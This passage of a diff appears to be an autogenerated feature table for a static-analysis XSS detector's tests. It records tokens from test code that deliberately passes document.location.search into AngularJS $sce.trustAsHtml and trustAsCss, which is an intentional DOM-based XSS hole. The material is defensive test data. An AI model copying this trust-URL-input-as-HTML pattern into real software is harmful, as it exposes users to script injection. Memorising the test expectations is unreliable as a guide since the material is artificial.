autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:42:80:47 | $other | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:12 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:12 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:12 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:12 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:12 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:24 | $sce.trustAsHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:24 | $sce.trustAsHtml | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:24 | $sce.trustAsHtml | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:24 | $sce.trustAsHtml | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:24 | $sce.trustAsHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | $sce.tr ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | exceptional return of $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | exceptional return of $sce.tr ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | exceptional return of $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | exceptional return of $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:9:81:50 | exceptional return of $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:14:81:24 | trustAsHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:14:81:24 | trustAsHtml | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:14:81:24 | trustAsHtml | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:14:81:24 | trustAsHtml | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:14:81:24 | trustAsHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:33 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:33 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:33 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:33 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:33 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:42 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:42 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:42 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:42 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:26:81:42 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:81:26:81:49 | documen ... .search | CalleeFlexibleAccessPath | $sce.trustAsHtml | | autogenerated/Xss/DomBasedXss/tst.js:81:26:81:49 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:81:26:81:49 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16267,6 +113494,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:81:26:81:49 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:81:26:81:49 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:81:26:81:49 | documen ... .search | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:81:35:81:42 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:35:81:42 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:35:81:42 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:35:81:42 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:35:81:42 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:81:44:81:49 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:81:44:81:49 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:81:44:81:49 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:81:44:81:49 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:81:44:81:49 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:12 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:12 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:12 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:12 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:12 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:23 | $sce.trustAsCss | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:23 | $sce.trustAsCss | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:23 | $sce.trustAsCss | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:23 | $sce.trustAsCss | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:23 | $sce.trustAsCss | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | $sce.tr ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | exceptional return of $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | exceptional return of $sce.tr ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | exceptional return of $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | exceptional return of $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:9:82:49 | exceptional return of $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:14:82:23 | trustAsCss | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:14:82:23 | trustAsCss | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:14:82:23 | trustAsCss | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:14:82:23 | trustAsCss | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:14:82:23 | trustAsCss | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:32 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:32 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:32 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:32 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:32 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:41 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:41 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:41 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:41 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:82:25:82:41 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:82:25:82:48 | documen ... .search | CalleeFlexibleAccessPath | $sce.trustAsCss | | autogenerated/Xss/DomBasedXss/tst.js:82:25:82:48 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:82:25:82:48 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16275,6 +113547,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:82:25:82:48 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:82:25:82:48 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:82:25:82:48 | documen ... .search | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:82:34:82:41 | location | contextFunctionInterfaces | 